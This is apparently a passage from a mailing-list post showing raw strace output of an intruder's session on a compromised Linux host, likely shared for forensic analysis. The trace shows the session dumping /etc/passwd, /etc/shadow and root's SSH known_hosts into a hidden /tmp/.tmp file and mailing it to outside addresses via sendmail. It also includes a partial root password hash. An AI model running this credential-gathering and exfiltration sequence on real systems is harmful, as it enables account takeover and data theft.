munmap(0x4001e000, 4096) = 0
ioctl(5, 0x8913, 0xbffff1e0) = 0
ioctl(5, 0x8927, 0xbffff1e0) = 0
ioctl(5, 0x891d, 0xbffff1e0) = 0
ioctl(5, 0x8921, 0xbffff1e0) = 0
ioctl(5, 0x8970, 0xbffff1e0) = 0
ioctl(5, 0x8970, 0xbffff1e0) = 0
ioctl(5, 0x8942, 0xbffff1e0) = 0
ioctl(5, 0x8915, 0xbffff1e0) = 0
ioctl(5, 0x8917, 0xbffff1e0) = 0
ioctl(5, 0x8919, 0xbffff1e0) = 0
ioctl(5, 0x891b, 0xbffff1e0) = 0
open("/proc/net/if_inet6", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/proc/net/dev", O_RDONLY) = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x4001e000
read(6, "Inter-| Receive "..., 1024) = 569
close(6) = 0
munmap(0x4001e000, 4096) = 0
ioctl(5, 0x8913, 0xbffff1e0) = 0
ioctl(5, 0x8927, 0xbffff1e0) = 0
ioctl(5, 0x891d, 0xbffff1e0) = 0
ioctl(5, 0x8921, 0xbffff1e0) = 0
ioctl(5, 0x8970, 0xbffff1e0) = 0
ioctl(5, 0x8970, 0xbffff1e0) = 0
ioctl(5, 0x8942, 0xbffff1e0) = 0
ioctl(5, 0x8915, 0xbffff1e0) = 0
ioctl(5, 0x8917, 0xbffff1e0) = 0
ioctl(5, 0x8919, 0xbffff1e0) = 0
ioctl(5, 0x891b, 0xbffff1e0) = 0
open("/proc/net/if_inet6", O_RDONLY) = -1 ENOENT (No such file or directory)
close(5) = 0
write(1, "eth0 Link encap:Ethernet H"..., 1234) = 1234
munmap(0x4001d000, 4096) = 0
exit_group(0) = ?
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1065
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
open("/tmp/.tmp", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
dup2(4, 1) = 1
close(4) = 0
execve("/bin/cat", ["cat", "/etc/passwd", "/etc/shadow",
"/root/.ssh/known_hosts"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...}) = 0
brk(0) = 0x804c4a8
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40016000
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4) = 0
open("/lib/tls/libc.so.6", O_RDONLY) = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4,
0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575,
seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0,
useable:1}) = 0
munmap(0x40017000, 31716) = 0
brk(0) = 0x804c4a8
brk(0x804d4a8) = 0x804d4a8
brk(0) = 0x804d4a8
brk(0x804e000) = 0x804e000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4) = 0
fstat64(1, {st_mode=S_IFREG|0644, st_size=1234, ...}) = 0
open("/etc/passwd", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=1391, ...}) = 0
read(4, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1391
write(1, "root:x:0:0:root:/root:/bin/bash\n"..., 1391) = 1391
read(4, "", 4096) = 0
close(4) = 0
open("/etc/shadow", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0400, st_size=1047, ...}) = 0
read(4, "root:$1$n0xS10QY$U9Vb/IkGFHKgaxj"..., 4096) = 1047
write(1, "root:$1$n0xS10QY$U9Vb/IkGFHKgaxj"..., 1047) = 1047
read(4, "", 4096) = 0
close(4) = 0
open("/root/.ssh/known_hosts", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=1541, ...}) = 0
read(4, "10.1.10.191 ssh-rsa [REDACTED KEY STUFF]"..., 4096) = 1541
write(1, "10.1.10.191 ssh-rsa [REDACTED KEY STUFF]"..., 1541) = 1541
read(4, "", 4096) = 0
close(4) = 0
close(1) = 0
exit_group(0) = ?
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1066
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
open("/tmp/.tmp", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
dup2(4, 1) = 1
close(4) = 0
execve("/usr/bin/find", ["find", "/home", "-name", "known_hosts", "-exec",
"cat", "{}"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...}) = 0
brk(0) = 0x8054414
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40016000
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4) = 0
open("/lib/tls/libc.so.6", O_RDONLY) = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4,
0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575,
seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0,
useable:1}) = 0
munmap(0x40017000, 31716) = 0
brk(0) = 0x8054414
brk(0x8055414) = 0x8055414
brk(0) = 0x8055414
brk(0x8056000) = 0x8056000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4) = 0
time(NULL) = 1063931038
open("/usr/share/locale/locale.alias", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=2601, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40017000
read(4, "# Locale name alias data base.\n#"..., 4096) = 2601
read(4, "", 4096) = 0
close(4) = 0
munmap(0x40017000, 4096) = 0
open("/usr/share/locale/en_US.UTF-8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1
ENOENT (No such file or directory)
open("/usr/share/locale/en_US.utf8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1
ENOENT (No such file or directory)
open("/usr/share/locale/en_US/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT
(No such file or directory)
open("/usr/share/locale/en.UTF-8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1
ENOENT (No such file or directory)
open("/usr/share/locale/en.utf8/LC_MESSAGES/findutils.mo", O_RDONLY) = -1
ENOENT (No such file or directory)
open("/usr/share/locale/en/LC_MESSAGES/findutils.mo", O_RDONLY) = -1 ENOENT (No
such file or directory)
write(2, "find: ", 6) = 6
write(2, "missing argument to `-exec\'", 27) = 27
write(2, "\n", 1) = 1
exit_group(1) = ?
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1067
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
close(4) = 0
dup2(5, 1) = 1
close(5) = 0
stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0
access("/bin/cat", X_OK) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
execve("/bin/cat", ["cat", "/tmp/.tmp"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...}) = 0
brk(0) = 0x804c4a8
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40016000
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4) = 0
open("/lib/tls/libc.so.6", O_RDONLY) = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4,
0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575,
seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0,
useable:1}) = 0
munmap(0x40017000, 31716) = 0
brk(0) = 0x804c4a8
brk(0x804d4a8) = 0x804d4a8
brk(0) = 0x804d4a8
brk(0x804e000) = 0x804e000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4) = 0
fstat64(1, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
open("/tmp/.tmp", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=5213, ...}) = 0
read(4, "eth0 Link encap:Ethernet H"..., 4096) = 4096
write(1, "eth0 Link encap:Ethernet H"..., 4096) = 4096
read(4, "28HbRLshEW8T3dU=\n10.1.10.174 ssh"..., 4096) = 1117
write(1, "28HbRLshEW8T3dU=\n10.1.10.174 ssh"..., 1117
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1068
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
dup2(4, 0) = 0
close(4) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
execve("/usr/sbin/sendmail", ["/usr/sbin/sendmail", "-f", "ownage@xxxxxx",
"m0nkeyhack@xxxxxxxxxxxxx"], [/* 19 vars */]
Attachment:
signature.asc
Description: This is a digitally signed message part